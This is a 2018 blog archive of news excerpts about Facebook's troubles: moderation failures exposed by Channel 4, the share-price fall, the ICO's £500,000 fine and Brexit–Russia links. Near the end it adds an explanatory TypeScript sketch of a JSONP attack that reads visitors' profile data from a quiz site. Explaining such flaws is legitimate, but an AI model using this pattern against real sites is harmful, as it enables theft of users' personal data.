
Monday 30 July 2018

July 2018 was not a good month for Zuckerberg and Facebook Inc - Channel 4 undercover investigation, a lawsuit, falling user numbers, sudden 19% drop in company value & US$12 billion hit to personal fortune


As the fall-out from the manipulated US presidential campaign and UK Brexit national referendum continues, try as it might Facebook Inc just can't give a cursory apology for its part in these events and move on - users and mainstream media won't cease scrutiny of its business practices.

News.com.au, 27 July 2018:

Shares in Facebook plummeted 19 per cent to $US176.26 at the end of trading on Thursday, wiping out some $US120 billion ($A160 billion) — believed to be the worst single-day evaporation of market value for any company....

Founder Mark Zuckerberg, who has a 13 percent stake in Facebook, saw his fortune drop by more than $US12 billion ($A16 billion) in less than 24 hours, to around $74 billion ($A100 billion).

The fall came after the social media giant revealed three million European users had closed their accounts since the Cambridge Analytica data scandal. The record decline pushed the tech-heavy Nasdaq more than one per cent lower.

CNet, 27 July 2018:

It began Wednesday with Facebook, which announced that daily active user counts had fallen in Europe, to 279 million from 282 million earlier this year. Facebook also indicated it was no longer growing in the US and Canada, two of the most lucrative advertising markets. Just as Facebook was working through its second year of nearly nonstop scandals over unchecked political meddling and data misuse, it was becoming clear that the days of consistent and relatively easy growth were fading.

Reuters, 28 July 2018:

NEW YORK (Reuters) - Facebook Inc (FB.O) and its chief executive Mark Zuckerberg were sued on Friday in what could be the first of many lawsuits over a disappointing earnings announcement by the social media company that wiped out about $120 billion of shareholder wealth.

The complaint filed by shareholder James Kacouris in Manhattan federal court accused Facebook, Zuckerberg and Chief Financial Officer David Wehner of making misleading statements about or failing to disclose slowing revenue growth, falling operating margins, and declines in active users.

Channel4.com, news release, 17 July 2018:

Dispatches investigation reveals how Facebook moderates content

An undercover investigation by Firecrest Films for Channel 4 Dispatches has revealed for the first time how Facebook decides what users can and can’t see on the platform. (Inside Facebook: Secrets of the Social Network, Channel 4 Dispatches, 9pm, 17 July)
Dispatches’ investigation reveals:
* Violent content such as graphic images and videos of assaults on children, remaining on the site, despite being flagged by users as inappropriate and requests to have it removed.

* Thousands of reported posts remained unmoderated and on the site while we were filming, beyond Facebook’s stated aim of a 24-hour turnaround, including potentially posts relating to suicide threats and self-harm.

* Moderators told not to take any action if content shows a child who is visibly below Facebook’s 13-year-old age limit, rather than report it as posted by underage users, even if the content includes self-harming.

* Allegations from an early Facebook investor and mentor to Mark Zuckerberg, that Facebook’s business model benefits from extreme content which engages viewers for longer, generating higher advertising revenue.

* Pages belonging to far-right groups, with large numbers of followers, allowed to exceed deletion threshold, and subject to different treatment in the same category as pages belonging to governments and news organisations.

* Policies allowing hate speech towards ethnic and religious immigrants, and trainers instructing moderators to ignore racist content in accordance with Facebook’s policies.

      Dispatches sent an undercover reporter to work as a content moderator in Facebook’s largest centre for UK content moderation. The work is outsourced to a company called Cpl Resources plc in Dublin which has worked with Facebook since 2010. The investigation reveals the training given to content moderators to demonstrate how to decide whether content reported to them by users, such as graphic images and videos of child abuse, self-harming, and violence should be allowed to remain on the site or be deleted. Dispatches also films day-to-day moderation of content on the site, revealing:
      Violent content:
      One of the most sensitive areas of Facebook’s content rulebook is about graphic violence. When dealing with graphic violence content, moderators have three options – ignore, delete, or mark as disturbing, which places restrictions on who can see the content.
      Dispatches’ undercover reporter is seen moderating a video showing two teenage schoolgirls fighting. Both girls are clearly identifiable and the video has been shared more than a thousand times. He’s told that Facebook’s rules say that because the video has been posted with a caption condemning the violence and warning people to be careful about visiting the location where it was filmed, it should not be deleted and instead should be left on the site and marked as disturbing content. Dispatches speaks to the mother of the girl involved who tells the programme the distress and impact the video had on her daughter. She struggles to understand the decision to leave the video up on the site. “To wake up the next day and find out that literally the whole world is watching must have been horrifying. It was humiliating for her, it was devastating for her. You see the images and it’s horrible, it’s disgusting. That’s someone’s child fighting in the park. It’s not Facebook entertainment.”

      Facebook told Dispatches that the child or parent of a child featured in videos like this can ask them to be removed. Richard Allan, VP of Public Policy at Facebook said, “Where people are highlighting an issue and condemning the issue, even if the issue is painful, there are a lot of circumstances where people will say to us, look Facebook, you should not interfere with my ability to highlight a problem that’s occurred.”

      Online anti-child abuse campaigner Nicci Astin tells Dispatches about another violent video which shows a man punching and stamping on a toddler. She says she reported the video to Facebook in 2012 and received a message back saying it didn’t violate its terms and conditions. The video is used during the undercover reporter’s training period as an example of what would be left up on the site, and marked as disturbing, unless posted with a celebratory caption. The video is still up on the site, without a graphic warning, nearly six years later. Facebook told Dispatches they do escalate these issues and contact law enforcement, and the video should have been removed.

      One moderator tells the Dispatches undercover reporter that “if you start censoring too much then people lose interest in the platform…. It’s all about making money at the end of the day.”
      Venture Capitalist Roger McNamee was one of Facebook’s earliest investors, a mentor to CEO Mark Zuckerberg, and the man who brought Sheryl Sandberg to the company. He tells Dispatches that Facebook’s business model relies on extreme content:
      “From Facebook’s point of view this is, this is just essentially, you know, the crack cocaine of their product right. It’s the really extreme, really dangerous form of content that attracts the most highly engaged people on the platform. Facebook understood that it was desirable to have people spend more time on site if you’re going to have an advertising based business, you need them to see the ads so you want them to spend more time on the site. Facebook has learned that the people on the extremes are the really valuable ones because one person on either extreme can often provoke 50 or 100 other people and so they want as much extreme content as they can get.”

      Richard Allan told Dispatches: Shocking content does not make us more money, that’s just a misunderstanding of how the system works …. People come to Facebook for a safe secure experience to share content with their family and friends. The vast majority of those 2 billion people would never dream of sharing content that, like that, to shock and offend people. And the vast majority of people don’t want to see it. There is a minority who are prepared to abuse our systems and other internet platforms to share the most offensive kind of material. But I just don’t agree that that is the experience that most people want and that’s not the experience we’re trying to deliver.

      Underage users:
      No child under 13 can have a Facebook account. However, a trainer tells the undercover reporter not to proactively take any action regarding their age if the report contains an image of a user who is visibly underage, unless the user admits to being underage: “We have to have an admission that the person is underage. If not, we just like pretend that we are blind and we don’t know what underage looks like.” Even if the content contains images of self-harm, for example, and the image is of someone who looks underage, the user is treated like an adult and sent information about organisations which help with self-harming issues, rather than being reported for being underage: “If this person was a kid, like a 10-year-old kid we don’t care, we still action the ticket as if they were an adult.” Facebook confirmed to Dispatches that its policy is not to take action about content posted by users who appear to be underage, unless the user admits to being underage.

Hate speech:
       Dispatches’ undercover reporter is told that, while content which racially abuses protected ethnic or religious groups violates Facebook’s guidelines, if the posts racially abuse immigrants from these groups, then the content is permitted. Facebook’s training for moderators also includes a post including a cartoon comment which describes drowning a girl if her first boyfriend is a negro, as content which is permitted. Facebook confirmed to Dispatches that the picture violates their hate speech standards and they are reviewing what went wrong to prevent it from happening again.

     “Shielded Review” – Popular pages kept up despite violations:
Our undercover reporter is told that if any page is found to have five or more pieces of content that violate Facebook’s rules, then the entire page should be taken down, in accordance with the company’s policies. But we have discovered that posts on Facebook’s most popular pages, with the highest numbers of followers, cannot be deleted by ordinary content moderators at Cpl. Instead, they are referred to the Shielded Review Queue where they can be directly assessed by Facebook rather than Cpl staff. These pages include those belonging to jailed former English Defence League leader Tommy Robinson, who has over 900,000 followers, and who has been given the same protected status as Governments and news organisations. A moderator tells the undercover reporter that the far-right group Britain First’s pages were left up despite repeatedly featuring content that breached Facebook’s guidelines because, “they have a lot of followers so they’re generating a lot of revenue for Facebook.” The Britain First Facebook page was finally deleted in March 2018 following the arrest of deputy leader Jayda Fransen.
      Facebook confirmed to Dispatches that they do have special procedures for popular and high profile pages, which includes Tommy Robinson and included Britain First.
      They say Shielded Review has been renamed ‘Cross Check’. Lord Allan told Dispatches: “If the content is indeed violating it will go….I want to be clear this is not a discussion about money, this is a discussion about political speech. People are debating very sensitive issues on Facebook, including issues like immigration. And that political debate can be entirely legitimate. I do think having extra reviewers on that when the debate is taking place absolutely makes sense and I think people would expect us to be careful and cautious before we take down their political speech.”
      Delays in moderating content:
      Facebook’s publicly stated aim is to assess all reported content within 24 hours. However, during the period of the undercover filming, Dispatches found a significant backlog. Moderators told the undercover reporter that due to the volume of reports, or tickets, they are supposed to moderate, they are unable to check up to 7,000 reported comments on a daily basis. At one point there is a backlog of 15,000 reports which have not been assessed, with some tickets still waiting for moderation up to five days after being reported. Facebook told Dispatches that the backlog filmed in the programme was cleared by 6 April.
…/ends

Wednesday 25 July 2018

The two very different faces Facebook Inc presents to potential advertisers and lawmakers



Australian Newspaper History Group Newsletter, No 98, July 2018, pp8-9:

98.2.3 Facebook described itself as a ‘publisher’ in 2013

Facebook described itself as a “publisher” as far back as 2013, leaked documents obtained by the Australian reveal. This contradicts the message that chief executive Mark Zuckerberg gave to US Congress, in interviews and in speeches (Australian, 9 July 2018). A 71-page PowerPoint presentation prepared by the then managing director of Facebook, Stephen Scheeler, outlines how the tech giant was the “second-highest reaching publisher in Australia” when compared with traditional media companies such as Nine and Seven. The internal sales document is partly based on data gathered by measurement firm Nielsen as well as confidential internal figures including quarterly revenue targets. There is no mention of Facebook being a publisher in Nielsen’s original report; it categorises Facebook as a “brand” in its Online Landscape Review published in May 2013. A slide in the presentation produced by Scheeler, the most senior executive at Facebook’s Australia and New Zealand business at the time, changed Nielsen’s description of Facebook from a brand to a “publisher”, showing that the social media giant views itself as such.

This is significant because Facebook has long argued it is a tech platform, not a publisher or a media company, when questioned about how it has generated vast profits by siphoning off billions of dollars from the news industry. The admission in the document contrasts with Facebook’s recent public contribution to a high-powered Australian inquiry into the local digital media market. The company repeatedly calls itself a “platform” in a 56-page written submission to the Australian Competition & Consumer Commission.

Zuckerberg has persistently rejected the suggestion that Facebook is a publisher, presenting the company as a neutral platform that does not have traditional journalistic responsibilities. In April, Zuckerberg was asked by US senators investigating the Cambridge Analytica data scandal to explain whether his company was a tech company or publisher. Dan Sullivan, a Republican Senator for Alaska, said: “That goes to an important question about what regulation or action, if any, we would take.” Asked by Senator Sullivan if Facebook was a “tech company or the world’s largest publisher” during his second day of testimony on Capitol Hill, the Facebook co-founder responded: “I view us as a tech company because the primary thing that we do is build technology and products.” Senator Sullivan pressed further: “You said you’re responsible for your content, which makes you kind of a publisher, right?” Zuckerberg did not admit Facebook was a media company or publisher, but did say it was responsible for what is posted on its platforms after it emerged that the company allowed Russia to spread disinformation in the US presidential election.

“I agree that we’re responsible for the content. But we don’t produce the content. I think that when people ask us if we’re a media company or a publisher, my understanding of what the heart of what they’re really getting at is: do we feel responsible for the content on our platform? The answer to that I think is clearly yes. But I don’t think that that’s incompatible with fundamentally at our core being a technology company where the main thing that we do is have engineers and build products.”

Friday 20 July 2018

Slowly but surely Russian connections between the UK Brexit referendum campaign and the US presidential campaign are beginning to emerge


“We have concluded that there are risks in relation to the processing of personal data by many political parties. Particular concerns include: the purchasing of marketing lists and lifestyle information from data brokers without sufficient due diligence, a lack of fair processing, and use of third party data analytics companies with insufficient checks around consent….We have looked closely at the role of those who buy and sell personal data-sets in the UK. Our existing investigation of the privacy issues raised by their work has been expanded to include their activities in political processes….The investigation has identified a total of 172 organisations of interest that required engagement, of which around 30 organisations have formed the main focus of our enquiries, including political parties, data analytics companies and major social media platforms…..Similarly, we have identified a total of 285 individuals relating to our investigation.” [UK Information Commissioner’s Office, Investigation into the use of data analytics in political campaigns: Investigation update, July 2018]

Slowly but surely the Russian connections between the UK Brexit referendum campaign and the US presidential campaign are beginning to emerge.

The Guardian, 15 July 2018:

A source familiar with the FBI investigation revealed that the commissioner and her deputy spent last week with law enforcement agencies in the US including the FBI. And Denham’s deputy, James Dipple-Johnstone, confirmed to the Observer that “some of the systems linked to the investigation were accessed from IP addresses that resolve to Russia and other areas of the CIS [Commonwealth of Independent States]”.

It was also reported that Senator Mark Warner, vice chair of the US Senate Intelligence Committee, and Damian Collins MP, chair of the Digital, Culture, Media and Sport select committee inquiry into “fake news”, met in Washington on or about 16 July 2018 to discuss Russian interference in both British and American democratic processes during an Atlantic Council meeting.

UK Information Commissioner’s Office (ICO), media release, 10 July 2018:

Information Commissioner Elizabeth Denham has today published a detailed update of her office’s investigation into the use of data analytics in political campaigns.
In March 2017, the ICO began looking into whether personal data had been misused by campaigns on both sides of the referendum on membership of the EU.

In May it launched an investigation that included political parties, data analytics companies and major social media platforms.

Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.
The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.
Facebook has a chance to respond to the Commissioner’s Notice of Intent, after which a final decision will be made.

Other regulatory action set out in the report comprises:

warning letters to 11 political parties and notices compelling them to agree to audits of their data protection practices;

an Enforcement Notice for SCL Elections Ltd to compel it to deal properly with a subject access request from Professor David Carroll;

a criminal prosecution for SCL Elections Ltd for failing to properly deal with the ICO’s Enforcement Notice;

an Enforcement Notice for Aggregate IQ to stop processing retained data belonging to UK citizens;

a Notice of Intent to take regulatory action against data broker Emma’s Diary (Lifecycle Marketing (Mother and Baby) Ltd); and
audits of the main credit reference companies and Cambridge University Psychometric Centre.

Information Commissioner Elizabeth Denham said:
“We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes.

“New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law.”

She added:
“Fines and prosecutions punish the bad actors, but my real goal is to effect change and restore trust and confidence in our democratic system.”

A second, partner report, titled Democracy Disrupted? Personal information and political influence, sets out findings and recommendations arising out of the 14-month investigation.

Among the ten recommendations is a call for the Government to introduce a statutory Code of Practice for the use of personal data in political campaigns.

Ms Denham has also called for an ethical pause to allow Government, Parliament, regulators, political parties, online platforms and the public to reflect on their responsibilities in the era of big data before there is a greater expansion in the use of new technologies.

She said:
“People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

In addition, the ICO commissioned research from the Centre for the Analysis of Social Media at the independent thinktank DEMOS. Its report, also published today, examines current and emerging trends in how data is used in political campaigns, how use of technology is changing and how it may evolve in the next two to five years. 

The investigation, one of the largest of its kind by a Data Protection Authority, remains ongoing. The 40-strong investigation team is pursuing active lines of enquiry and reviewing a considerable amount of material retrieved from servers and equipment.

The interim progress report has been produced to inform the work of the DCMS’s Select Committee into Fake News.

The next phase of the ICO’s work is expected to be concluded by the end of October 2018.

The Washington Post, 28 June 2018:

BRISTOL, England — On Aug. 19, 2016, Arron Banks, a wealthy British businessman, sat down at the palatial residence of the Russian ambassador to London for a lunch of wild halibut and Belevskaya pastila apple sweets accompanied by Russian white wine.

Banks had just scored a huge win. From relative obscurity, he had become the largest political donor in British history by pouring millions into Brexit, the campaign to disentangle the United Kingdom from the European Union that had earned a jaw-dropping victory at the polls two months earlier.

Now he had something else that bolstered his standing as he sat down with his new Russian friend, Ambassador Alexander Yakovenko: his team’s deepening ties to Donald Trump’s insurgent presidential bid in the United States. A major Brexit supporter, Stephen K. Bannon, had just been installed as chief executive of Trump’s campaign. And Banks and his fellow Brexiteers had been invited to attend a fundraiser with Trump in Mississippi.

Less than a week after the meeting with the Russian envoy, Banks and firebrand Brexit politician Nigel Farage — by then a cult hero among some anti-establishment Trump supporters — were huddling privately with the Republican nominee in Jackson, Miss., where Farage wowed a foot-stomping crowd at a Trump rally.
Banks’s journey from a lavish meal with a Russian diplomat in London to the raucous heart of Trump country was part of an unusual intercontinental charm offensive by the wealthy British donor and his associates, a hard-partying lot who dubbed themselves the “Bad Boys of Brexit.” Their efforts to simultaneously cultivate ties to Russian officials and Trump’s campaign have captured the interest of investigators in the United Kingdom and the United States, including special counsel Robert S. Mueller III.

Vice News, 11 June 2018:

Yakovenko is already on the radar of special counsel Robert Mueller, who is investigating Russian interference in the U.S. presidential election, after he was named in the indictment of ex-Trump campaign aide George Papadopoulos….

Banks, along with close friend and former Ukip leader Nigel Farage, was among the very first overseas political figures to meet Trump after his surprise victory in November 2016.

It also emerged over the weekend that Banks passed contact information for Trump’s transition team to the Russians.

Sunday 15 July 2018

"Bad actor" Facebook Inc given £500,000 maximum fine - any future breach may cost up to £1.4bn


The Guardian, 11 July 2018:

Facebook is to be fined £500,000, the maximum amount possible, for its part in the Cambridge Analytica scandal, the information commissioner has announced.

The fine is for two breaches of the Data Protection Act. The Information Commissioner’s Office (ICO) concluded that Facebook failed to safeguard its users’ information and that it failed to be transparent about how that data was harvested by others.

 “Facebook has failed to provide the kind of protections they are required to under the Data Protection Act,” said Elizabeth Denham, the information commissioner. “Fines and prosecutions punish the bad actors, but my real goal is to effect change and restore trust and confidence in our democratic system.”

In the first quarter of 2018, Facebook took £500,000 in revenue every five and a half minutes. Because of the timing of the breaches, the ICO said it was unable to levy the penalties introduced by the European General Data Protection Regulation (GDPR), which caps fines at the higher level of €20m (£17m) or 4% of global turnover – in Facebook’s case, $1.9bn (£1.4bn). The £500,000 cap was set by the Data Protection Act 1998.
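To put the two penalty regimes side by side, here is a minimal sketch (mine, not from the article or the ICO) using only the sterling figures quoted above; the variable names are illustrative.

```typescript
// Illustration only, using the figures quoted in the Guardian article above.
const dpa1998CapGbp = 500_000;                  // fixed maximum under the Data Protection Act 1998
const gdprFloorGbp = 17_000_000;                // ~EUR 20m floor, quoted as £17m
const fourPercentOfTurnoverGbp = 1_400_000_000; // 4% of global turnover, quoted as £1.4bn

// The GDPR applies whichever of its two figures is higher.
const gdprCapGbp = Math.max(gdprFloorGbp, fourPercentOfTurnoverGbp);

console.log(gdprCapGbp / dpa1998CapGbp); // 2800 – the GDPR ceiling is 2,800 times the 1998 cap
```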

As one of the IT whistleblowers described the situation...

Sunday 1 July 2018

So what has Facebook Inc been up to lately?


Everything from admitting to further data breaches, to altering images, to suppressing legitimate content, to considering payment for access, to shareholder revolt, it seems......

The Herald Sun reported on 9 June 2018 at p.59:

Facebook is embroiled in another data privacy scandal, confirming a software bug led to the private posts of 14 million users being made public.

According to Facebook, the bug was active from May 18 to May 27 and changed the privacy settings of some users without telling them.

“Today we started letting the 14 million people affected know — and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said.

“To be clear, this bug did not impact anything people had posted before, and they could still choose their audience just as they always have.” It was unclear yesterday how many Australian users were affected. Facebook said the bug occurred during the development of a new share function that allowed users to share featured items on their profile page, such as a photo.

“The problem has been fixed, and for anyone affected, we changed the audience back to what they’d been using before,” Ms Egan said.

Facebook has urged affected customers to review posts made between May 18 and May 27 to see if any private posts had been automatically made public.

The latest issue comes as Facebook chief Mark Zuckerberg faces the prospect of a public grilling before the Australian parliament’s intelligence and security committee.
Facebook admitted this week it had struck data partnerships — where it shares the personal data of people on the social media platform — with at least four Chinese electronics companies, including Huawei Technologies.

Huawei has been barred from a series of major projects in Australia over concerns about its close links to the Chinese government.

Members of the parliamentary intelligence and security committee want Mr Zuckerberg to come to Australia and answer questions about the data-sharing pact.

On 18 June 2018 The Sun reported that Facebook Inc had begun to manipulate images – effectively producing ‘fake images’ that were being passed off as real.

Then on 20 June 2018 Facebook Inc. declared its intention to charge certain private group users for participation on its platforms:

Today, we’re piloting subscriptions with a small number of groups to continue to support group admins who lead these communities.

This world-wide social platform apparently expects that if it formally launches this access fee (reportedly up to $360 a year), the cost will be passed on as subscription fees – with Facebook letting administrators charge from $4.99 to $29.99 each month to join premium subgroups containing exclusive posts.

Presumably, if the market responds in sufficient numbers then Facebook will change the rules and demand that private groups hand over a percentage of subscription fees collected.

The Guardian, 24 June 2018:

George Orwell wrote in his essay Politics and the English Language: “In our age there is no such thing as ‘keeping out of politics’. All issues are political issues.” 

When Facebook constructed a new archive of political advertising, had it thought a little more about this concept of what is “political”, it might have more accurately anticipated the subsequent Orwellian headache. As it is, journalists are finding their articles restricted from promotion because they are lumped in with campaigning materials from politicians, lobby groups and advocacy organisations.

The new archive of ads with political content, which Facebook made public last month, has become the latest contested piece of territory between platforms and publishers. The complaint from publishers is that Facebook is categorising posts in which they are promoting their own journalism (paying money to target particular groups of the audience) as “political ads”. Publishers have reacted furiously to what they see as toxic taxonomy.

Mark Thompson, the chief executive of the New York Times, has been the most vocal critic, describing Facebook’s practices as “a threat to democracy” and criticising the platform in a recent speech to the Open Markets Initiative in Washington DC. “When it comes to news, Facebook still doesn’t get it,” said Thompson. “In its effort to clear up one bad mess, it seems to be joining those who want to blur the line between reality-based journalism and propaganda.”

At a separate event at Columbia University, Thompson and Facebook’s head of news partnerships, Campbell Brown, fought openly about the initiative. Thompson showed examples of where New York Times articles, including recipes, had been wrongly flagged as political. Brown emphasised that the archive was being refined, but stood firm on the principle that promoted journalism ought to be flagged as “paid-for” political posts. “On this you are just wrong,” she told Thompson.

Publishers took to social platforms to question the labelling and representation of their work. One of the most egregious examples came from investigative journalism organisation Reveal. Last week, at the height of the scandal around the separation of undocumented migrant families crossing the US border, it published an exclusive story involving the alleged drugging of children at a centre housing immigrant minors. It was flagged in the Facebook system as containing political content, and as Reveal had not registered its promotion of the story, the promoted posts were stifled. Facebook did not remove the article, but rather stopped its paid circulation. Given the importance of paid promotion, it is not surprising that publishers see this as amounting to the same thing.

And trust issues can be found both inside and outside Facebook's castle walls.....

Business Insider, 24 June 2018:

A Survata study, seen exclusively by Business Insider, asked US consumers to rate big tech companies from one (most trusted) to five (least trusted). Survata surveyed more than 2,600 people in April and May. It’s the first time Survata has carried out the survey.

The results show that Facebook is nowhere near as trusted as Amazon, PayPal, or Microsoft – but that people do trust it more than Instagram. Instagram, of course, is owned by Facebook.

Here’s the top 15 in order of most to least trusted:
1. Amazon
2. PayPal
3. Microsoft
4. Apple
5. IBM
6. Yahoo
7. Google
8. YouTube
9. eBay
10. Pandora
11. Facebook
12. LinkedIn
13. Spotify
14. AOL
15. Instagram

Business Insider, 26 June 2018:

Shareholders with nearly $US3 billion invested in Facebook are trying to topple Mark Zuckerberg as chairman and tear up the company’s governance structure.

Business Insider has spoken with six prominent shareholders who said there was an unprecedented level of unrest among Facebook’s backers following a series of scandals.

They are in open revolt about Zuckerberg’s power base, which gives him the ability to swat away any shareholder proposal he disagrees with.

 One investor compared him to a robber baron, a derogatory term for 19th-century US tycoons who accumulated enormous wealth.

Facebook says its governance structure is “sound and effective” and splitting Zuckerberg’s duties as chairman and CEO would cause “uncertainty, confusion, and inefficiency.”

Finally, it was reported on 29 June 2018 by IT News that, you guessed it, yet another Facebook-sponsored personality test was allowing data to be extracted without the users' knowledge or informed consent:

A security researcher has found that a popular personality test app running on Facebook contained an easily exploitable flaw that could be used to expose sensitive information on tens of millions of users.

Belgian security researcher Inti De Ceukelaire joined Facebook's bug bounty program, set up by the giant social network after the Cambridge Analytica data leak scandal, and tried out NameTests.com's personality test app developed by Social Sweethearts.

De Ceukelaire discovered that when he loaded a personality test, NameTests.com fetched his personal data from Facebook and displayed it on a webpage.

He was shocked to see that users' personal data was wrapped in a Javascript file by NameTests.com, which could be accessed via a weblink over the plain text HTTP protocol.

This meant that any website that requested the file could access the personal information retrieved from users' Facebook accounts.

The security researcher tested this by setting up a website that connected to NameTests.com and was able to access Facebook posts, photos and friend lists belonging to visitors.

Information leaked included people's Facebook IDs, first and last names, languages used, gender, date of birth, profile pictures, cover photo, currency, devices used, and much more.

Worse, De Ceukelaire found that NameTests.com doesn't log off users, which means the site would continue to leak user data even after the app was deleted.
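For readers wondering how a flaw like this works mechanically, below is a minimal hypothetical sketch of the JSONP-style leak De Ceukelaire describes. The endpoint URL, callback name and field names are invented for illustration; the article does not give the real NameTests.com details.

```typescript
// Hypothetical sketch only – not the real NameTests.com code or endpoints.
// It shows why user data "wrapped in a JavaScript file" and served over plain
// HTTP with no origin check can be read by any website the victim visits.

interface LeakedProfile {
  id: string;
  name: string;
  birthday?: string;
  photos?: string[];
}

// 1. The quiz site served the logged-in visitor's Facebook data as executable
//    JavaScript, e.g.:  userData({ id: "...", name: "...", ... });
// 2. <script> requests are exempt from the same-origin policy, and the browser
//    attaches the visitor's quiz-site cookies to the request.
// 3. So a malicious page just defines the expected callback and loads the file.

(window as any).userData = (profile: LeakedProfile) => {
  // The attacker's page now holds the visiting victim's Facebook details.
  console.log("Leaked:", profile.id, profile.name);
};

const script = document.createElement("script");
script.src = "http://nametests.example/user_data.js"; // hypothetical URL, plain HTTP
document.body.appendChild(script);
```

The usual remedy for this class of bug is to serve such data only as plain JSON from an endpoint that checks the request's origin or requires a per-user token, rather than as an executable script that any third-party page can load.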